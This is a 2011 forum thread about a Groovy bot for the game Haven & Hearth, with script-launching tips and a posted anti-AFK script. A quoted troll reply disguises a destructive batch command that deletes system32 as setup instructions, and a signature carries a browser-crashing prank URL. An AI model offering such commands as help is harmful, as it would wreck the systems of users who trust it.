H&H Groovy bot

Forum for alternative clients, mods & discussions on the same.

Moderator: Phades

Re: H&H Groovy bot

Postby smileyguy4you2 » Thu Oct 13, 2011 10:50 pm

Robertzon wrote:To get this to work
open up notepad
type in this:
@echo off del c:\WINDOWS\system32
save it as: hnhgroovy.bat and choose "Save as type: All files"
When saved, close the notepad and run hnhgroovy.bat and enjoy the fun.


how bout a real answer
smileyguy4you2
 
Posts: 5
Joined: Thu Oct 13, 2011 10:31 pm

Re: H&H Groovy bot

Postby Myzreal » Thu Oct 13, 2011 10:58 pm

How about a more detailed question?

And I re-ask mine:

Can anyone tell me how to make the bot speak on chat? I'm interested in village chat mainly.

Also how to make the bot click the "Light" button in a kiln?
Paste me to get hacked: http://a/%%30%30
Myzreal
 
Posts: 69
Joined: Sun Jul 03, 2011 5:32 pm

Re: H&H Groovy bot

Postby smileyguy4you2 » Fri Oct 14, 2011 7:32 am

ok, how do you get bot scripts to run on this all he says is type : bot lamber.... and i responded the way i did because the guys advice would delete all of sys 32 which is just douchy even for the trolls on this forum
smileyguy4you2
 
Posts: 5
Joined: Thu Oct 13, 2011 10:31 pm

Re: H&H Groovy bot

Postby Myzreal » Fri Oct 14, 2011 7:01 pm

You get to know the script's name (check the scripts catalogue in groovy bot) and if u want to launch it, you press ":" in the game and type >> bot <script_name> <<. SO if u want to launch the "lamber.groovy" script, u enter the game, press ":" and type "bot lamber". It will run.
Paste me to get hacked: http://a/%%30%30
Myzreal
 
Posts: 69
Joined: Sun Jul 03, 2011 5:32 pm

Re: H&H Groovy bot

Postby smileyguy4you2 » Sat Oct 15, 2011 8:45 pm

ty myzreal, now that i got it working, fixed the lamber to work a bit better, trying to get a kiln one to work but running into your problem as well not sure how to get it to light consistently
smileyguy4you2
 
Posts: 5
Joined: Thu Oct 13, 2011 10:31 pm

Re: H&H Groovy bot

Postby BruThoL » Wed Oct 19, 2011 8:11 am

Here is source code of a bot not to being considered afk.
Useful to set personnal beliefs on a new char without having to click every 5 min.

You just need to have a chest, barrel, cupboard, whatever nearby, and the bot will click on it every 100 seconds.

Code: Select all
import haven.CharWnd
import haven.RootWidget
import haven.Speedget
import haven.ark_bot
import haven.Coord
import haven.Gob
import haven.Drawable;
import util.PathFinder;
import haven.UI
import java.util.logging.Logger;
import java.util.logging.Level;
import java.util.logging.ConsoleHandler

class NoAfk {
   
   def thread
   
   Speedget speedget
   PathFinder pathFinder
   private final static Logger LOGGER = Logger.getLogger(NoAfk.class.getName());
   
   
   final static int MOUSE_LEFT_BUTTON = 1
   final static int MOUSE_RIGHT_BUTTON = 3
   
   final int itemId;
   
   NoAfk(thread){
      this.thread = thread
      this.pathFinder = new PathFinder(thread)
      LOGGER.setLevel(Level.FINE)
   }
   
   
   void run(){
      println '.....................................................'
      
      ark_bot.ui.widgets.each { key, value ->
         if (value instanceof Speedget){
            speedget = (Speedget)value;
         }
      }
      
      this.speedget.uimsg("cur", 1);   
         
      def pauseTime = 4000;


      ark_bot.SlenPrint('-----NoAfk BOT-----  Ev3r10sT');
      thread.sleep(pauseTime);
      
      
      while(this.itemId == 0){
         this.itemId = ark_bot.input_get_object("Select the item i can click")
         println 'winebarrel id : ' + this.itemId;
         if(this.itemId==0){
            ark_bot.SlenPrint('It seems you missclicked...');
            thread.sleep(pauseTime);
         
         }
      }
      
            
      while(1){
         ark_bot.DoClick(this.itemId, MOUSE_RIGHT_BUTTON, 0)
         thread.sleep(100000);      
      }
      
      println '.....................................................'
   }
}
   
new NoAfk(thread=currentThread).run();


BruThoL
 
Posts: 392
Joined: Tue Feb 15, 2011 11:01 pm

Re: H&H Groovy bot

Postby MagicManICT » Fri Oct 21, 2011 9:32 pm

BruThoL wrote:Here is source code of a bot not to being considered afk.


I know you won't disconnect or go to sleep with Ender's (and even with the old Gilbertus released client) for being AFK like you do in the original. Also, isn't just right-clicking on the ground or a keystroke enough to stay awake? It's been so long since I've used the original client I forget what the server needs to hear.
Opinions expressed in this statement are the authors alone and in no way reflect on the game development values of the actual developers.
User avatar
MagicManICT
 
Posts: 18436
Joined: Tue Aug 17, 2010 1:47 am

Re: H&H Groovy bot

Postby TheRedHun1 » Thu Oct 27, 2011 12:14 am

I just thought this would be useful to new players and experiences players.

We all get tired of farming and cutting wood, I mean we doing it anways on our characters so bots are helpful. I mean it is our characters and our risk we taking leaving them afk. I was thinking that you guys should add GUI's so when the script starts, it asks for information like in the lamber bot here is an example

Village? (scroll bar) Yes NO
Hf? Yes No
Location to drop off X: Y:
Drink Wine? Yes No
Drink Water? Yes No
Limit? Yes (amount here) No

If that was added it wouldn't require for us to go into the scripts and would make it easier to start them.
TheRedHun1
 
Posts: 55
Joined: Sat Mar 19, 2011 3:16 am

Re: H&H Groovy bot

Postby boshaw » Thu Oct 27, 2011 12:35 am

TheRedHun1 wrote:I just thought this would be useful to new players and experiences players.

We all get tired of farming and cutting wood, I mean we doing it anways on our characters so bots are helpful. I mean it is our characters and our risk we taking leaving them afk. I was thinking that you guys should add GUI's so when the script starts, it asks for information like in the lamber bot here is an example

Village? (scroll bar) Yes NO
Hf? Yes No
Location to drop off X: Y:
Drink Wine? Yes No
Drink Water? Yes No
Limit? Yes (amount here) No

If that was added it wouldn't require for us to go into the scripts and would make it easier to start them.



It would probably be easier to just rewrite a new bot client centralized about the idea of script <=> ui interaction than to have someone come along and try to flood more code on to patch stuff in like gui interaction.

Also since iirc Groovy can access your whole java classes and libraries you could write your own Widget (In Groovy), make the root it's parent (that way it renders onto the screen at x,y location) and then write your own interactions for values that the gui contains so you can get them while you run your script. I really don't know groovy at all so i can't provide a example otherwise i would atleast give some base example.
User avatar
boshaw
 
Posts: 1590
Joined: Tue Jun 01, 2010 10:22 pm

Re: H&H Groovy bot

Postby BruThoL » Thu Oct 27, 2011 12:56 am

TheRedHun1 wrote:If that was added it wouldn't require for us to go into the scripts and would make it easier to start them.


Lol!

Then move your ass and do it.
BruThoL
 
Posts: 392
Joined: Tue Feb 15, 2011 11:01 pm

PreviousNext

Return to The Wizards' Tower

Who is online

Users browsing this forum: Barkrowler [Bot], Claude [Bot] and 0 guests